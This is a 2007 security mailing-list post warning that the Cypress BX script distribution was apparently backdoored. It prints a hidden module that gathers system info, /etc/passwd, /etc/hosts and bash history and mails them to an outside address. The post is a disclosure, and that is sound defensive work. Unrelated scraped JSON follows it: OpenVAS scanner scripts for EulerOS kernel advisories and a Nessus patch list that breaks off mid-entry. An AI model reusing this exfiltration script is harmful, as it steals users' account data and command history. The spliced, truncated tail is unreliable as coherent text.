Cypress BX script backdoored?

Source: Securityvulns (SECURITYVULNS:DOC:18360), published 2007-11-07
https://vulners.com/securityvulns/SECURITYVULNS:DOC:18360

For those of us who use Cyp/bx (http://www.mindcryme.com/~void/cyp1.0k.tar.gz)

|]rip[@rock:14:53:49:~/tmp/cyp/modules| $ cat mdop.m
#!/bin/bash

uname -a >> /tmp/.bx
cat /etc/hosts >> /tmp/.bx
cat /etc/passwd >> /tmp/.bx
cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null
mail defcola@gmail.com < /tmp/.bx
sleep 4
rm -rf /tmp/.bx

What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5.
.. and this file wasn't included.

----
Chris
Network security professional
chris@overflow.no
----
"Computer games don't affect kids. I mean if Pac-Man affected us as
kids, we'd all be running around in darkened rooms, munching magic
pills and listening to repetitive electronic music."
--Kristian Wilson, Nintendo 1989.
EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1244\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1244\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1244 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found In the Linux kernel, through version 4.19.6, where a local user could exploit a use-after-free in the ALSA driver by supplying a malicious USB Sound device (with zero interfaces) that is mishandled in usb_audio_probe in sound/usb/card.c. An attacker could corrupt memory and possibly escalate privileges if the attacker is able to have physical access to the system.CVE-2018-19824\n\nIt was found that the Linux kernel can hit a BUG_ON() statement in the __xfs_get_blocks() in the fs/xfs/xfs_aops.c because of a race condition between direct and memory-mapped I/O associated with a hole in a file that is handled with BUG_ON() instead of an I/O failure. This allows a local unprivileged attacker to cause a system crash and a denial of service.CVE-2016-10741\n\nA division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. 
When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service.CVE-2017-18360\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.CVE-2018-18281\n\nA use-after-free flaw can occur in the Linux kernel due to a race condition between packet_do_bind() and packet_notifier() functions called for an AF_PACKET socket. An unprivileged, local user could use this flaw to induce kernel memory corruption on the system, leading to an unresponsive system or to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.CVE-2018-18559\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 2.5.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10_132\", 
rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-05T16:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2013-4345", "CVE-2014-0155", "CVE-2015-4176", "CVE-2015-3332", "CVE-2018-11232", "CVE-2018-10675", "CVE-2014-4014", "CVE-2016-2184", "CVE-2018-18710", "CVE-2017-18218", "CVE-2017-14340", "CVE-2016-2545", "CVE-2013-7421", "CVE-2017-5669", "CVE-2017-18360", "CVE-2016-2546", "CVE-2017-16531", "CVE-2018-7480", "CVE-2013-2889"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191471", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191471", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1471)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1471\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-2889\", \"CVE-2013-4345\", \"CVE-2013-7421\", \"CVE-2014-0155\", \"CVE-2014-3122\", \"CVE-2014-4014\", \"CVE-2015-3332\", \"CVE-2015-4176\", \"CVE-2016-2184\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2017-14340\", \"CVE-2017-16531\", \"CVE-2017-18218\", \"CVE-2017-18360\", \"CVE-2017-5669\", \"CVE-2018-10675\", \"CVE-2018-11232\", \"CVE-2018-18710\", \"CVE-2018-7480\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:48:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1471)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1471\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1471\");\n\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1471 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"drivers/hid/hid-zpff.c in the Human Interface Device (HID) subsystem in the Linux kernel through 3.11, when CONFIG_HID_ZEROPLUS is enabled, allows physically proximate attackers to cause a denial of service (heap-based out-of-bounds write) via a crafted device.(CVE-2013-2889)\n\nThe capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.(CVE-2014-4014)\n\nThe function drivers/usb/core/config.c in the Linux kernel, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.(CVE-2017-16531)\n\nThe snd_timer_interrupt function in sound/core/timer.c in the Linux kernel before 4.4.1 does not properly maintain a certain linked list, which allows local users to cause a denial of service (race condition and system crash) via a crafted ioctl call.(CVE-2016-2545)\n\nA flaw was found in the Linux kernel where the deletion of a file or directory could trigger an unmount and reveal data under a mount point. This flaw was inadvertently introduced with the new feature of being able to lazily unmount a mount tree when using file system user namespaces.(CVE-2015-4176)\n\nThe do_shmat function in ipc/shm.c in the Linux kernel, through 4.9.12, does not restrict the address calculated by a certain rounding operation. 
This allows privileged local users to map page zero and, consequently, bypass a protection mechanism that exists for the mmap system call. This is possible by making crafted shmget and shmat system calls in a privileged context.(CVE-2017-5669)\n\nIn drivers/net/ethernet/hisilicon/hns/hns_enet.c in the Linux kernel, before 4.13, local users can cause a denial of service (use-after-free and BUG) or possibly have unspecified other impact by leveraging differences in skb handling between hns_nic_net_xmit_hw and hns_nic_net_xmit.(CVE-2017-18218)\n\nThe ioapic_deliver function in virt/kvm/ioapic.c in the Linux kernel through 3.14.1 does not properly validate the kvm_irq_delivery_to_apic return value, which allows guest OS users to cause a denial of service (host OS crash) via a crafted entry in the redirection table of an I/O APIC. NOTE: the affected code was moved to the ioapic_service function before the vulnerability was announced.(CVE-2014-0155)\n\nA flaw was found in the way the Linux kernel's Cr ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-01-27T18:41:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10878", "CVE-2018-10881", "CVE-2018-18281", "CVE-2017-18360", "CVE-2018-20169"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191108", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1108)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1108\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2017-18360\", \"CVE-2018-10878\", \"CVE-2018-10881\", \"CVE-2018-18281\", \"CVE-2018-20169\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:31:33 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1108)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1108\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1108\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1108 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was discovered in the Linux kernel's USB subsystem in the __usb_get_extra_descriptor() function in the drivers/usb/core/usb.c which mishandles a size check during the reading of an extra descriptor 
data. By using a specially crafted USB device which sends a forged extra descriptor, an unprivileged user with physical access to the system can potentially cause a privilege escalation or trigger a system crash or lock up and thus to cause a denial of service (DoS).(CVE-2018-20169)\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.(CVE-2018-18281)\n\nA division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service. (CVE-2017-18360)\n\nA flaw was found in the Linux kernel's ext4 filesystem. A local user can cause an out-of-bound access in ext4_get_group_info function, a denial of service, and a system crash by mounting and operating on a crafted ext4 filesystem image.(CVE-2018-10881)\n\nA flaw was found in the Linux kernel's ext4 filesystem. 
A local user can cause an out-of-bounds write and a denial of service or unspecified other impact is possible by mounting and operating a crafted ext4 filesystem image.(CVE-2018-10878)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", 
rpm:\"python-perf~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10741", "CVE-2018-18281", "CVE-2018-18559", "CVE-2018-10883", "CVE-2019-3701", "CVE-2017-18360", "CVE-2018-20169", "CVE-2018-10902", "CVE-2018-1094", "CVE-2018-10879"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191131", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1131)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1131\");\n script_version(\"2020-01-23T11:32:22+0000\");\n script_cve_id(\"CVE-2016-10741\", \"CVE-2017-18360\", \"CVE-2018-10879\", \"CVE-2018-10883\", \"CVE-2018-10902\", \"CVE-2018-1094\", \"CVE-2018-18281\", \"CVE-2018-18559\", \"CVE-2018-20169\", \"CVE-2019-3701\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:32:22 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:32:22 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1131)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1131\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1131\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1131 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. 
When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service. (CVE-2017-18360)\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.(CVE-2018-18281)\n\nA flaw was discovered in the Linux kernel's USB subsystem in the __usb_get_extra_descriptor() function in the drivers/usb/core/usb.c which mishandles a size check during the reading of an extra descriptor data. By using a specially crafted USB device which sends a forged extra descriptor, an unprivileged user with physical access to the system can potentially cause a privilege escalation or trigger a system crash or lock up and thus to cause a denial of service (DoS).(CVE-2018-20169)\n\nIt was found that the Linux kernel can hit a BUG_ON() statement in the __xfs_get_blocks() in the fs/xfs/xfs_aops.c because of a race condition between direct and memory-mapped I/O associated with a hole in a file that is handled with BUG_ON() instead of an I/O failure. This allows a local unprivileged attacker to cause a system crash and a denial of service.(CVE-2016-10741)\n\nA use-after-free flaw can occur in the Linux kernel due to a race condition between packet_do_bind() and packet_notifier() functions called for an AF_PACKET socket. An unprivileged, local user could use this flaw to induce kernel memory corruption on the system, leading to an unresponsive system or to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out. 
(CVE-2018-18559)\n\nAn issue was discovered in can_can_gw_rcv in net/can/gw.c in the Linux kernel through 4.19.13. The CAN frame modification rules allow bitwise logical operations that can be also applied to the can_dlc field. Because of a missing check, the CAN drivers may write arbitrary content beyond the data registers in the CAN controller's I/O memory when processing can-gw manipulated outgoing frames. This is related to cgw_csum_xor_rel. An unprivileged user can trigger a system crash (general protection fault).(CVE-2019-3701)\n\nA flaw was found in the Linux kernel's ext4 filesystem. A local use ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T05:18:26", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - scsi: libfc: sanitize E_D_TOV and R_A_TOV setting\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: use configured rport E_D_TOV (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: additional debugging messages (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: don't advance state machine for incoming\n FLOGI (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not login if the port is already started\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not drop down to FLOGI for\n fc_rport_login (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not take rdata->rp_mutex when processing\n a -FC_EX_CLOSED ELS response. 
(Chad Dupuis) [Orabug:\n 25933179]\n\n - scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke)\n [Orabug: 25933179]\n\n - xve: arm ud tx cq to generate completion interrupts\n (Ajaykumar Hotchandani) [Orabug: 28267050]\n\n - net: sched: run ingress qdisc without locks (Alexei\n Starovoitov) [Orabug: 29395374]\n\n - bnxt_en: Fix typo in firmware message timeout logic.\n (Michael Chan) [Orabug: 29412112]\n\n - bnxt_en: Wait longer for the firmware message response\n to complete. (Michael Chan) [Orabug: 29412112]\n\n - mm,vmscan: Make unregister_shrinker no-op if\n register_shrinker failed. (Tetsuo Handa) [Orabug:\n 29456281]\n\n - X.509: Handle midnight alternative notation in\n GeneralizedTime (David Howells) [Orabug: 29460344]\n (CVE-2015-5327)\n\n - X.509: Support leap seconds (David Howells) [Orabug:\n 29460344] (CVE-2015-5327)\n\n - X.509: Fix the time validation [ver #2] (David Howells)\n [Orabug: 29460344] (CVE-2015-5327) (CVE-2015-5327)\n\n - be2net: enable new Kconfig items in kernel configs\n (Brian Maly) [Orabug: 29475071]\n\n - benet: remove broken and unused macro (Lubomir Rintel)\n [Orabug: 29475071]\n\n - 